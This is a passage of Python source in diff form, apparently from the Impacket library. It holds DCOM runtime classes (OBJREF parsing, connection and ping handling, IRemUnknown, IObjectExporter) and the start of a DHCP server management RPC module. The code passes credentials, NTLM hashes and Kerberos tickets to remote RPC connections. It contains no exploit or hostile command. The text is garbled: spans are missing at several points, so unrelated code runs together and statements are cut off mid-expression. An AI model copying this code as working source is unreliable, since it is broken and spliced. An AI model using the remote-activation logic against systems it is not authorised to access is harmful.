('ObjectReferenceSize',ULONG), + ('pObjectData',':'), + ) + def __init__(self, data = None,isNDR64 = False): + OBJREF.__init__(self, data, isNDR64) + if data is None: + self['flags'] = FLAGS_OBJREF_CUSTOM + +# 2.2.18.8 DATAELEMENT +class DATAELEMENT(NDRSTRUCT): + structure = ( + ('dataID',GUID), + ('cbSize',ULONG), + ('cbRounded',ULONG), + ('Data',':'), + ) + +class DUALSTRINGARRAYPACKED(NDRSTRUCT): + structure = ( + ('wNumEntries',USHORT), + ('wSecurityOffset',USHORT), + ('aStringArray',':'), + ) + def getDataLen(self, data, offset=0): + return self['wNumEntries']*2 + +# 2.2.18.7 OBJREF_EXTENDED +class OBJREF_EXTENDED(OBJREF): + structure = ( + ('std',STDOBJREF), + ('Signature1',ULONG), + ('saResAddr',DUALSTRINGARRAYPACKED), + ('nElms',ULONG), + ('Signature2',ULONG), + ('ElmArray',DATAELEMENT), + ) + def __init__(self, data = None, isNDR64 = False): + OBJREF.__init__(self, data, isNDR64) + if data is None: + self['flags'] = FLAGS_OBJREF_EXTENDED + self['Signature1'] = 0x4E535956 + self['Signature1'] = 0x4E535956 + self['nElms'] = 0x4E535956 + +# 2.2.19 DUALSTRINGARRAY +class USHORT_ARRAY(NDRUniConformantArray): + item = ' 0 or len(deletedOids) > 0: + if 'setid' in DCOMConnection.OID_SET[target]: + setId = DCOMConnection.OID_SET[target]['setid'] + else: + setId = 0 + resp = objExporter.ComplexPing(setId, 0, addedOids, deletedOids) + DCOMConnection.OID_SET[target]['oids'] -= deletedOids + DCOMConnection.OID_SET[target]['oids'] |= addedOids + DCOMConnection.OID_SET[target]['setid'] = resp['pSetId'] + else: + objExporter.SimplePing(DCOMConnection.OID_SET[target]['setid']) + except Exception as e: + # There might be exceptions when sending packets + # We should try to continue tho. + LOG.error(str(e)) + pass + + DCOMConnection.PINGTIMER = Timer(120,DCOMConnection.pingServer) + try: + DCOMConnection.PINGTIMER.start() + except Exception as e: + if str(e).find('threads can only be started once') < 0: + raise e + + def initTimer(self): + if self.__oxidResolver is True: + if DCOMConnection.PINGTIMER is None: + DCOMConnection.PINGTIMER = Timer(120, DCOMConnection.pingServer) + try: + DCOMConnection.PINGTIMER.start() + except Exception as e: + if str(e).find('threads can only be started once') < 0: + raise e + + def initConnection(self): + stringBinding = r'ncacn_ip_tcp:%s' % self.__target + rpctransport = transport.DCERPCTransportFactory(stringBinding) + + if hasattr(rpctransport, 'set_credentials') and len(self.__userName) >=0: + # This method exists only for selected protocol sequences. + rpctransport.set_credentials(self.__userName, self.__password, self.__domain, self.__lmhash, self.__nthash, + self.__aesKey, self.__TGT, self.__TGS) + rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost) + self.__portmap = rpctransport.get_dce_rpc() + self.__portmap.set_auth_level(self.__authLevel) + if self.__doKerberos is True: + self.__portmap.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) + self.__portmap.connect() + DCOMConnection.PORTMAPS[self.__target] = self.__portmap + + def CoCreateInstanceEx(self, clsid, iid): + scm = IRemoteSCMActivator(self.__portmap) + iInterface = scm.RemoteCreateInstance(clsid, iid) + self.initTimer() + return iInterface + + def get_dce_rpc(self): + return DCOMConnection.PORTMAPS[self.__target] + + def disconnect(self): + if DCOMConnection.PINGTIMER is not None: + del(DCOMConnection.PORTMAPS[self.__target]) + del(DCOMConnection.OID_SET[self.__target]) + if len(DCOMConnection.PORTMAPS) == 0: + # This means there are no more clients using this object, kill it + DCOMConnection.PINGTIMER.cancel() + DCOMConnection.PINGTIMER.join() + DCOMConnection.PINGTIMER = None + if self.__target in INTERFACE.CONNECTIONS: + del(INTERFACE.CONNECTIONS[self.__target][currentThread().getName()]) + self.__portmap.disconnect() + #print INTERFACE.CONNECTIONS + +class CLASS_INSTANCE: + def __init__(self, ORPCthis, stringBinding): + self.__stringBindings = stringBinding + self.__ORPCthis = ORPCthis + self.__authType = RPC_C_AUTHN_WINNT + self.__authLevel = RPC_C_AUTHN_LEVEL_PKT_PRIVACY + def get_ORPCthis(self): + return self.__ORPCthis + def get_string_bindings(self): + return self.__stringBindings + def get_auth_level(self): + if RPC_C_AUTHN_LEVEL_NONE < self.__authLevel < RPC_C_AUTHN_LEVEL_PKT_PRIVACY: + if self.__authType == RPC_C_AUTHN_WINNT: + return RPC_C_AUTHN_LEVEL_PKT_INTEGRITY + else: + return RPC_C_AUTHN_LEVEL_PKT_PRIVACY + return self.__authLevel + def set_auth_level(self, level): + self.__authLevel = level + def get_auth_type(self): + return self.__authType + def set_auth_type(self, authType): + self.__authType = authType + + +class INTERFACE: + # class variable holding the transport connections, organized by target IP + CONNECTIONS = {} + + def __init__(self, cinstance=None, objRef=None, ipidRemUnknown=None, iPid=None, oxid=None, oid=None, target=None, + interfaceInstance=None): + if interfaceInstance is not None: + self.__target = interfaceInstance.get_target() + self.__iPid = interfaceInstance.get_iPid() + self.__oid = interfaceInstance.get_oid() + self.__oxid = interfaceInstance.get_oxid() + self.__cinstance = interfaceInstance.get_cinstance() + self.__objRef = interfaceInstance.get_objRef() + self.__ipidRemUnknown = interfaceInstance.get_ipidRemUnknown() + else: + if target is None: + raise Exception('No target') + self.__target = target + self.__iPid = iPid + self.__oid = oid + self.__oxid = oxid + self.__cinstance = cinstance + self.__objRef = objRef + self.__ipidRemUnknown = ipidRemUnknown + # We gotta check if we have a container inside our connection list, if not, create + if (self.__target in INTERFACE.CONNECTIONS) is not True: + INTERFACE.CONNECTIONS[self.__target] = {} + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()] = {} + + if objRef is not None: + self.process_interface(objRef) + + def process_interface(self, data): + objRefType = OBJREF(data)['flags'] + objRef = None + if objRefType == FLAGS_OBJREF_CUSTOM: + objRef = OBJREF_CUSTOM(data) + elif objRefType == FLAGS_OBJREF_HANDLER: + objRef = OBJREF_HANDLER(data) + elif objRefType == FLAGS_OBJREF_STANDARD: + objRef = OBJREF_STANDARD(data) + elif objRefType == FLAGS_OBJREF_EXTENDED: + objRef = OBJREF_EXTENDED(data) + else: + LOG.error("Unknown OBJREF Type! 0x%x" % objRefType) + + if objRefType != FLAGS_OBJREF_CUSTOM: + if objRef['std']['flags'] & SORF_NOPING == 0: + DCOMConnection.addOid(self.__target, objRef['std']['oid']) + self.__iPid = objRef['std']['ipid'] + self.__oid = objRef['std']['oid'] + self.__oxid = objRef['std']['oxid'] + if self.__oxid is None: + objRef.dump() + raise Exception('OXID is None') + + def get_oxid(self): + return self.__oxid + + def set_oxid(self, oxid): + self.__oxid = oxid + + def get_oid(self): + return self.__oid + + def set_oid(self, oid): + self.__oid = oid + + def get_target(self): + return self.__target + + def get_iPid(self): + return self.__iPid + + def set_iPid(self, iPid): + self.__iPid = iPid + + def get_objRef(self): + return self.__objRef + + def set_objRef(self, objRef): + self.__objRef = objRef + + def get_ipidRemUnknown(self): + return self.__ipidRemUnknown + + def get_dce_rpc(self): + return INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] + + def get_cinstance(self): + return self.__cinstance + + def set_cinstance(self, cinstance): + self.__cinstance = cinstance + + def is_fdqn(self): + # I will assume the following + # If I can't socket.inet_aton() then it's not an IPv4 address + # Same for ipv6, but since socket.inet_pton is not available in Windows, I'll look for ':'. There can't be + # an FQDN with ':' + # Is it isn't both, then it is a FDQN + try: + socket.inet_aton(self.__target) + except: + # Not an IPv4 + try: + self.__target.index(':') + except: + # Not an IPv6, it's a FDQN + return True + return False + + + def connect(self, iid = None): + if (self.__target in INTERFACE.CONNECTIONS) is True: + if currentThread().getName() in INTERFACE.CONNECTIONS[self.__target] and \ + (self.__oxid in INTERFACE.CONNECTIONS[self.__target][currentThread().getName()]) is True: + dce = INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] + currentBinding = INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding'] + if currentBinding == iid: + # We don't need to alter_ctx + pass + else: + newDce = dce.alter_ctx(iid) + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] = newDce + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding'] = iid + else: + stringBindings = self.get_cinstance().get_string_bindings() + # No OXID present, we should create a new connection and store it + stringBinding = None + isTargetFDQN = self.is_fdqn() + LOG.debug('Target system is %s and isFDQN is %s' % (self.get_target(), isTargetFDQN)) + for strBinding in stringBindings: + # Here, depending on the get_target() value several things can happen + # 1) it's an IPv4 address + # 2) it's an IPv6 address + # 3) it's a NetBios Name + # we should handle all this cases accordingly + # Does this match exactly what get_target() returns? + LOG.debug('StringBinding: %s' % strBinding['aNetworkAddr']) + if strBinding['wTowerId'] == 7: + # If there's port information, let's strip it for now. + if strBinding['aNetworkAddr'].find('[') >= 0: + binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[') + bindingPort = '[' + bindingPort + else: + binding = strBinding['aNetworkAddr'] + bindingPort = '' + + if binding.upper().find(self.get_target().upper()) >= 0: + stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1] + break + # If get_target() is a FQDN, does it match the hostname? + elif isTargetFDQN and binding.upper().find(self.get_target().upper().partition('.')[0]) >= 0: + # Here we replace the aNetworkAddr with self.get_target() + # This is to help resolving the target system name. + # self.get_target() has been resolved already otherwise we wouldn't be here whereas + # aNetworkAddr is usually the NetBIOS name and unless you have your DNS resolver + # with the right suffixes it will probably not resolve right. + stringBinding = 'ncacn_ip_tcp:%s%s' % (self.get_target(), bindingPort) + break + + LOG.debug('StringBinding chosen: %s' % stringBinding) + if stringBinding is None: + # Something wen't wrong, let's just report it + raise Exception('Can\'t find a valid stringBinding to connect') + + dcomInterface = transport.DCERPCTransportFactory(stringBinding) + if hasattr(dcomInterface, 'set_credentials'): + # This method exists only for selected protocol sequences. + dcomInterface.set_credentials(*DCOMConnection.PORTMAPS[self.__target].get_credentials()) + dcomInterface.set_kerberos(DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kerberos(), + DCOMConnection.PORTMAPS[self.__target].get_rpc_transport().get_kdcHost()) + dcomInterface.set_connect_timeout(300) + dce = dcomInterface.get_dce_rpc() + + if iid is None: + raise Exception('IID is None') + else: + dce.set_auth_level(self.__cinstance.get_auth_level()) + dce.set_auth_type(self.__cinstance.get_auth_type()) + + dce.connect() + + if iid is None: + raise Exception('IID is None') + else: + dce.bind(iid) + + if self.__oxid is None: + #import traceback + #traceback.print_stack() + raise Exception("OXID NONE, something wrong!!!") + + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()] = {} + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid] = {} + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'] = dce + INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['currentBinding'] = iid + else: + # No connection created + raise Exception('No connection created') + + def request(self, req, iid = None, uuid = None): + req['ORPCthis'] = self.get_cinstance().get_ORPCthis() + req['ORPCthis']['flags'] = 0 + self.connect(iid) + dce = self.get_dce_rpc() + try: + resp = dce.request(req, uuid) + except Exception as e: + if str(e).find('RPC_E_DISCONNECTED') >= 0: + msg = str(e) + '\n' + msg += "DCOM keep-alive pinging it might not be working as expected. You can't be idle for more than 14 minutes!\n" + msg += "You should exit the app and start again\n" + raise DCERPCException(msg) + else: + raise + return resp + + def disconnect(self): + return INTERFACE.CONNECTIONS[self.__target][currentThread().getName()][self.__oxid]['dce'].disconnect() + + +# 3.1.1.5.6.1 IRemUnknown Methods +class IRemUnknown(INTERFACE): + def __init__(self, interface): + self._iid = IID_IRemUnknown + #INTERFACE.__init__(self, interface.get_cinstance(), interface.get_objRef(), interface.get_ipidRemUnknown(), + # interface.get_iPid(), target=interface.get_target()) + INTERFACE.__init__(self, interfaceInstance=interface) + self.set_oxid(interface.get_oxid()) + + def RemQueryInterface(self, cRefs, iids): + # For now, it only supports a single IID + request = RemQueryInterface() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['ripid'] = self.get_iPid() + request['cRefs'] = cRefs + request['cIids'] = len(iids) + for iid in iids: + _iid = IID() + _iid['Data'] = iid + request['iids'].append(_iid) + resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown()) + #resp.dump() + + return IRemUnknown2( + INTERFACE(self.get_cinstance(), None, self.get_ipidRemUnknown(), resp['ppQIResults']['std']['ipid'], + oxid=resp['ppQIResults']['std']['oxid'], oid=resp['ppQIResults']['std']['oxid'], + target=self.get_target())) + + def RemAddRef(self): + request = RemAddRef() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['cInterfaceRefs'] = 1 + element = REMINTERFACEREF() + element['ipid'] = self.get_iPid() + element['cPublicRefs'] = 1 + request['InterfaceRefs'].append(element) + resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown()) + return resp + + def RemRelease(self): + request = RemRelease() + request['ORPCthis'] = self.get_cinstance().get_ORPCthis() + request['ORPCthis']['flags'] = 0 + request['cInterfaceRefs'] = 1 + element = REMINTERFACEREF() + element['ipid'] = self.get_iPid() + element['cPublicRefs'] = 1 + request['InterfaceRefs'].append(element) + resp = self.request(request, IID_IRemUnknown, self.get_ipidRemUnknown()) + DCOMConnection.delOid(self.get_target(), self.get_oid()) + return resp + +# 3.1.1.5.7 IRemUnknown2 Interface +class IRemUnknown2(IRemUnknown): + def __init__(self, interface): + IRemUnknown.__init__(self, interface) + self._iid = IID_IRemUnknown2 + +# 3.1.2.5.1 IObjectExporter Methods +class IObjectExporter: + def __init__(self, dce): + self.__portmap = dce + + # 3.1.2.5.1.1 IObjectExporter::ResolveOxid (Opnum 0) + def ResolveOxid(self, pOxid, arRequestedProtseqs): + self.__portmap.connect() + self.__portmap.bind(IID_IObjectExporter) + request = ResolveOxid() + request['pOxid'] = pOxid + request['cRequestedProtseqs'] = len(arRequestedProtseqs) + for protSeq in arRequestedProtseqs: + request['arRequestedProtseqs'].append(protSeq) + resp = self.__portmap.request(request) + Oxids = b''.join(pack(' 0: + for oid in addToSet: + oidn = OID() + oidn['Data'] = oid + request['AddToSet'].append(oidn) + else: + request['AddToSet'] = NULL + + if len(delFromSet) > 0: + for oid in delFromSet: + oidn = OID() + oidn['Data'] = oid + request['DelFromSet'].append(oidn) + else: + request['DelFromSet'] = NULL + resp = self.__portmap.request(request) + return resp + + # 3.1.2.5.1.4 IObjectExporter::ServerAlive (Opnum 3) + def ServerAlive(self): + self.__portmap.connect() + self.__portmap.bind(IID_IObjectExporter) + request = ServerAlive() + resp = self.__portmap.request(request) + return resp + + # 3.1.2.5.1.5 IObjectExporter::ResolveOxid2 (Opnum 4) + def ResolveOxid2(self,pOxid, arRequestedProtseqs): + self.__portmap.connect() + self.__portmap.bind(IID_IObjectExporter) + request = ResolveOxid2() + request['pOxid'] = pOxid + request['cRequestedProtseqs'] = len(arRequestedProtseqs) + for protSeq in arRequestedProtseqs: + request['arRequestedProtseqs'].append(protSeq) + resp = self.__portmap.request(request) + Oxids = b''.join(pack('. +# There are test cases for them too. +# +from __future__ import division +from __future__ import print_function +from impacket import system_errors +from impacket.dcerpc.v5.dtypes import LPWSTR, ULONG, NULL, DWORD, BOOL, BYTE, LPDWORD, WORD +from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRENUM, NDRUNION +from impacket.dcerpc.v5.rpcrt import DCERPCException +from impacket.dcerpc.v5.enum import Enum +from impacket.uuid import uuidtup_to_bin + +MSRPC_UUID_DHCPSRV = uuidtup_to_bin(('6BFFD098-A112-3610-9833-46C3F874532D', '1.0')) +MSRPC_UUID_DHCPSRV2 = uuidtup_to_bin(('5B821720-F63B-11D0-AAD2-00C04FC324DB', '1.0')) + + +class DCERPCSessionError(DCERPCException): + ERROR_MESSAGES = { + 0x00004E2D: ("ERROR_DHCP_JET_ERROR", "An error occurred while accessing the DHCP server database."), + 0x00004E25: ("ERROR_DHCP_SUBNET_NOT_PRESENT", "The specified IPv4 subnet does not exist."), + 0x00004E54: ("ERROR_DHCP_SUBNET_EXISTS", "The IPv4 scope parameters are incorrect. Either the IPv4 scope already" + " exists, corresponding to the SubnetAddress and SubnetMask members of " + "the structure DHCP_SUBNET_INFO (section 2.2.1.2.8), or there is a " + "range overlap of IPv4 addresses between those associated with the " + "SubnetAddress and SubnetMask fields of the new IPv4 scope and the " + "subnet address and mask of an already existing IPv4 scope"), + + } + def __init__(self, error_string=None, error_code=None, packet=None): + DCERPCException.__init__(self, error_string, error_code, packet) + + def __str__(self): + key = self.error_code + if key in system_errors.ERROR_MESSAGES: + error_msg_short = system_errors.ERROR_MESSAGES[key][0] + error_msg_verbose = system_errors.ERROR_MESSAGES[key][1] + return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + elif key in self.ERROR_MESSAGES: + error_msg_short = self.ERROR_MESSAGES[key][0] + error_msg_verbose = self.ERROR_MESSAGES[key][1] + return 'DHCPM SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose) + else: + return 'DHCPM SessionError: unknown error code: 0x%x' % self.error_code + +################################################################################ +# CONSTANTS +################################################################################ +DHCP_SRV_HANDLE = LPWSTR +DHCP_IP_ADDRESS = DWORD +DHCP_IP_MASK = DWORD +DHCP_OPTION_ID = DWORD + +# DHCP enumeratiom flags +DHCP_FLAGS_OPTION_DEFAULT = 0x00000000 +DHCP_FLAGS_OPTION_IS_VENDOR = 0x00000003 + +# Errors +ERROR_DHCP_JET_ERROR = 0x00004E2D +ERROR_DHCP_SUBNET_NOT_PRESENT = 0x00004E25 +ERROR_DHCP_SUBNET_EXISTS = 0x00004E54 +################################################################################ +# STRUCTURES +################################################################################ +# 2.2.1.1.3 DHCP_SEARCH_INFO_TYPE +class DHCP_SEARCH_INFO_TYPE(NDRENUM): + class enumItems(Enum): + DhcpClientIpAddress = 0 + DhcpClientHardwareAddress = 1 + DhcpClientName = 2 + +# 2.2.1.1.11 QuarantineStatus +class QuarantineStatus(NDRENUM): + class enumItems(Enum): + NOQUARANTINE = 0 + RESTRICTEDACCESS = 1 + DROPPACKET = 2 + PROBATION = 3 + EXEMPT = 4 + DEFAULTQUARSETTING = 5 + NOQUARINFO = 6 + +# 2.2.1.2.7 DHCP_HOST_INFO +class DHCP_HOST_INFO(NDRSTRUCT): + structure = ( + ('IpAddress', DHCP_IP_ADDRESS), + ('NetBiosName', LPWSTR), + ('HostName', LPWSTR), + ) + +# 2.2.1.2.9 DHCP_BINARY_DATA +class BYTE_ARRAY(NDRUniConformantArray): + item = 'c' + +class PBYTE_ARRAY(NDRPOINTER): + referent = ( + ('Data', BYTE_ARRAY), + ) + +class DHCP_BINARY_DATA(NDRSTRUCT): + structure = ( + ('DataLength', DWORD), + ('Data_', PBYTE_ARRAY), + ) + +DHCP_CLIENT_UID = DHCP_BINARY_DATA + +# 2.2.1.2.11 DATE_TIME +class DATE_TIME(NDRSTRUCT): + structure = ( + ('dwLowDateTime', DWORD), + ('dwHighDateTime', DWORD), + ) + +# 2.2.1.2.19 DHCP_CLIENT_INFO_VQ +class DHCP_CLIENT_INFO_VQ(NDRSTRUCT): + structure = ( + ('ClientIpAddress', DHCP_IP_ADDRESS), + ('SubnetMask', DHCP_IP_MASK), + ('ClientHardwareAddress', DHCP_CLIENT_UID), + ('ClientName', LPWSTR), + ('ClientComment', LPWSTR), + ('ClientLeaseExpires', DATE_TIME), + ('OwnerHost', DHCP_HOST_INFO), + ('bClientType', BYTE), + ('AddressState', BYTE), + ('Status', QuarantineStatus), + ('ProbationEnds', DATE_TIME), + ('QuarantineCapable', BOOL), + ) + +class DHCP_CLIENT_SEARCH_UNION(NDRUNION): + union = { + DHCP_SEARCH_INFO_TYPE.DhcpClientIpAddress: ('ClientIpAddress', DHCP_IP_ADDRESS), + DHCP_SEARCH_INFO_TYPE.DhcpClientHardwareAddress: ('ClientHardwareAddress', DHCP_CLIENT_UID), + DHCP_SEARCH_INFO_TYPE.DhcpClientName: ('ClientName', LPWSTR), + } + +class DHCP_SEARCH_INFO(NDRSTRUCT): + structure = ( + ('SearchType', DHCP_SEARCH_INFO_TYPE), + ('SearchInfo', DHCP_CLIENT_SEARCH_UNION), + ) + +# 2.2.1.2.14 DHCP_CLIENT_INFO_V4 +class DHCP_CLIENT_INFO_V4(NDRSTRUCT): + structure = ( + ('ClientIpAddress', DHCP_IP_ADDRESS), + ('SubnetMask', DHCP_IP_MASK), + ('ClientHardwareAddress', DHCP_CLIENT_UID), + ('ClientName', LPWSTR), + ('ClientComment', LPWSTR), + ('ClientLeaseExpires', DATE_TIME), + ('OwnerHost', DHCP_HOST_INFO), + ('bClientType', BYTE), + ) + +class DHCP_CLIENT_INFO_V5(NDRSTRUCT): + structure = ( + ('ClientIpAddress', DHCP_IP_ADDRESS), + ('SubnetMask', DHCP_IP_MASK), + ('ClientHardwareAddress', DHCP_CLIENT_UID), + ('ClientName', LPWSTR), + ('ClientComment', LPWSTR), + ('ClientLeaseExpires', DATE_TIME), + ('OwnerHost', DHCP_HOST_INFO), + ('bClientType', BYTE), + ('AddressState', BYTE), + ) + +class LPDHCP_CLIENT_INFO_V4(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_V4), + ) + +class LPDHCP_CLIENT_INFO_V5(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_V5), + ) + +# 2.2.1.2.115 DHCP_CLIENT_INFO_PB +class DHCP_CLIENT_INFO_PB(NDRSTRUCT): + structure = ( + ('ClientIpAddress', DHCP_IP_ADDRESS), + ('SubnetMask', DHCP_IP_MASK), + ('ClientHardwareAddress', DHCP_CLIENT_UID), + ('ClientName', LPWSTR), + ('ClientComment', LPWSTR), + ('ClientLeaseExpires', DATE_TIME), + ('OwnerHost', DHCP_HOST_INFO), + ('bClientType', BYTE), + ('AddressState', BYTE), + ('Status', QuarantineStatus), + ('ProbationEnds', DATE_TIME), + ('QuarantineCapable', BOOL), + ('FilterStatus', DWORD), + ('PolicyName', LPWSTR), + ) + +class LPDHCP_CLIENT_INFO_PB(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_PB), + ) + +class LPDHCP_CLIENT_INFO_VQ(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_VQ), + ) + +class DHCP_CLIENT_INFO_VQ_ARRAY(NDRUniConformantArray): + item = LPDHCP_CLIENT_INFO_VQ + +class LPDHCP_CLIENT_INFO_VQ_ARRAY(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_VQ_ARRAY), + ) + +class DHCP_CLIENT_INFO_ARRAY_VQ(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Clients', LPDHCP_CLIENT_INFO_VQ_ARRAY), + ) + +class LPDHCP_CLIENT_INFO_ARRAY_VQ(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_ARRAY_VQ), + ) + +class DHCP_CLIENT_INFO_V4_ARRAY(NDRUniConformantArray): + item = LPDHCP_CLIENT_INFO_V4 + +class DHCP_CLIENT_INFO_V5_ARRAY(NDRUniConformantArray): + item = LPDHCP_CLIENT_INFO_V5 + +class LPDHCP_CLIENT_INFO_V4_ARRAY(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_V4_ARRAY), + ) + +class LPDHCP_CLIENT_INFO_V5_ARRAY(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_V5_ARRAY), + ) + +class DHCP_CLIENT_INFO_ARRAY_V4(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Clients', LPDHCP_CLIENT_INFO_V4_ARRAY), + ) + +class DHCP_CLIENT_INFO_ARRAY_V5(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Clients', LPDHCP_CLIENT_INFO_V4_ARRAY), + ) + +class LPDHCP_CLIENT_INFO_ARRAY_V5(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_ARRAY_V5), + ) + +class LPDHCP_CLIENT_INFO_ARRAY_V4(NDRPOINTER): + referent = ( + ('Data', DHCP_CLIENT_INFO_ARRAY_V4), + ) + +class DHCP_IP_ADDRESS_ARRAY(NDRUniConformantArray): + item = DHCP_IP_ADDRESS + +class LPDHCP_IP_ADDRESS_ARRAY(NDRPOINTER): + referent = ( + ('Data', DHCP_IP_ADDRESS_ARRAY), + ) + +class DHCP_IP_ARRAY(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Elements', LPDHCP_IP_ADDRESS_ARRAY), + ) + +class DHCP_SUBNET_STATE(NDRENUM): + class enumItems(Enum): + DhcpSubnetEnabled = 0 + DhcpSubnetDisabled = 1 + DhcpSubnetEnabledSwitched = 2 + DhcpSubnetDisabledSwitched = 3 + DhcpSubnetInvalidState = 4 + +class DHCP_SUBNET_INFO(NDRSTRUCT): + structure = ( + ('SubnetAddress', DHCP_IP_ADDRESS), + ('SubnetMask', DHCP_IP_MASK), + ('SubnetName', LPWSTR), + ('SubnetComment', LPWSTR), + ('PrimaryHost', DHCP_HOST_INFO), + ('SubnetState', DHCP_SUBNET_STATE), + ) + +class LPDHCP_SUBNET_INFO(NDRPOINTER): + referent = ( + ('Data', DHCP_SUBNET_INFO), + ) + +class DHCP_OPTION_SCOPE_TYPE(NDRENUM): + class enumItems(Enum): + DhcpDefaultOptions = 0 + DhcpGlobalOptions = 1 + DhcpSubnetOptions = 2 + DhcpReservedOptions = 3 + DhcpMScopeOptions = 4 + +class DHCP_RESERVED_SCOPE(NDRSTRUCT): + structure = ( + ('ReservedIpAddress', DHCP_IP_ADDRESS), + ('ReservedIpSubnetAddress', DHCP_IP_ADDRESS), + ) + +class DHCP_OPTION_SCOPE_UNION(NDRUNION): + union = { + DHCP_OPTION_SCOPE_TYPE.DhcpDefaultOptions : (), + DHCP_OPTION_SCOPE_TYPE.DhcpGlobalOptions : (), + DHCP_OPTION_SCOPE_TYPE.DhcpSubnetOptions : ('SubnetScopeInfo', DHCP_IP_ADDRESS), + DHCP_OPTION_SCOPE_TYPE.DhcpReservedOptions : ('ReservedScopeInfo', DHCP_RESERVED_SCOPE), + DHCP_OPTION_SCOPE_TYPE.DhcpMScopeOptions : ('MScopeInfo', LPWSTR), + } + +class DHCP_OPTION_SCOPE_INFO(NDRSTRUCT): + structure = ( + ('ScopeType', DHCP_OPTION_SCOPE_TYPE), + ('ScopeInfo', DHCP_OPTION_SCOPE_UNION), + ) + +class LPDHCP_OPTION_SCOPE_INFO(NDRPOINTER): + referent = ( + ('Data', DHCP_OPTION_SCOPE_INFO) + ) + +class DWORD_DWORD(NDRSTRUCT): + structure = ( + ('DWord1', DWORD), + ('DWord2', DWORD), + ) + +class DHCP_BOOTP_IP_RANGE(NDRSTRUCT): + structure = ( + ('StartAddress', DHCP_IP_ADDRESS), + ('EndAddress', DHCP_IP_ADDRESS), + ('BootpAllocated', ULONG), + ('MaxBootpAllowed', DHCP_IP_ADDRESS), + ('MaxBootpAllowed', ULONG ), + ) + +class DHCP_IP_RESERVATION_V4(NDRSTRUCT): + structure = ( + ('ReservedIpAddress', DHCP_IP_ADDRESS), + ('ReservedForClient', DHCP_CLIENT_UID), + ('bAllowedClientTypes', BYTE), + ) + +class DHCP_IP_RANGE(NDRSTRUCT): + structure = ( + ('StartAddress', DHCP_IP_ADDRESS), + ('EndAddress', DHCP_IP_ADDRESS), + ) + +class DHCP_IP_CLUSTER(NDRSTRUCT): + structure = ( + ('ClusterAddress', DHCP_IP_ADDRESS), + ('ClusterMask', DWORD), + ) + +class DHCP_SUBNET_ELEMENT_TYPE(NDRENUM): + class enumItems(Enum): + DhcpIpRanges = 0 + DhcpSecondaryHosts = 1 + DhcpReservedIps = 2 + DhcpExcludedIpRanges = 3 + DhcpIpUsedClusters = 4 + DhcpIpRangesDhcpOnly = 5 + DhcpIpRangesDhcpBootp = 6 + DhcpIpRangesBootpOnly = 7 + +class DHCP_SUBNET_ELEMENT_UNION_V5(NDRUNION): + union = { + DHCP_SUBNET_ELEMENT_TYPE.DhcpIpRanges : ('IpRange', DHCP_BOOTP_IP_RANGE), + DHCP_SUBNET_ELEMENT_TYPE.DhcpSecondaryHosts : ('SecondaryHost', DHCP_HOST_INFO), + DHCP_SUBNET_ELEMENT_TYPE.DhcpReservedIps : ('ReservedIp', DHCP_IP_RESERVATION_V4), + DHCP_SUBNET_ELEMENT_TYPE.DhcpExcludedIpRanges : ('ExcludeIpRange', DHCP_IP_RANGE), + DHCP_SUBNET_ELEMENT_TYPE.DhcpIpUsedClusters : ('IpUsedCluster', DHCP_IP_CLUSTER), + } + +class DHCP_SUBNET_ELEMENT_DATA_V5(NDRSTRUCT): + structure = ( + ('ElementType', DHCP_SUBNET_ELEMENT_TYPE), + ('Element', DHCP_SUBNET_ELEMENT_UNION_V5), + ) + +class LPDHCP_SUBNET_ELEMENT_DATA_V5(NDRUniConformantArray): + item = DHCP_SUBNET_ELEMENT_DATA_V5 + +class DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRSTRUCT): + structure = ( + ('NumElements', DWORD), + ('Elements', LPDHCP_SUBNET_ELEMENT_DATA_V5), + ) + +class LPDHCP_SUBNET_ELEMENT_INFO_ARRAY_V5(NDRPOINTER): + referent = ( + ('Data', DHCP_SUBNET_ELEMENT_INFO_ARRAY_V5) + ) + +class DHCP_OPTION_DATA_TYPE(NDRENUM): + class enumItems(Enum): + DhcpByteOption = 0 + DhcpWordOption = 1 + DhcpDWordOption = 2 + DhcpDWordDWordOption = 3 + DhcpIpAddressOption = 4 + DhcpStringDataOption = 5 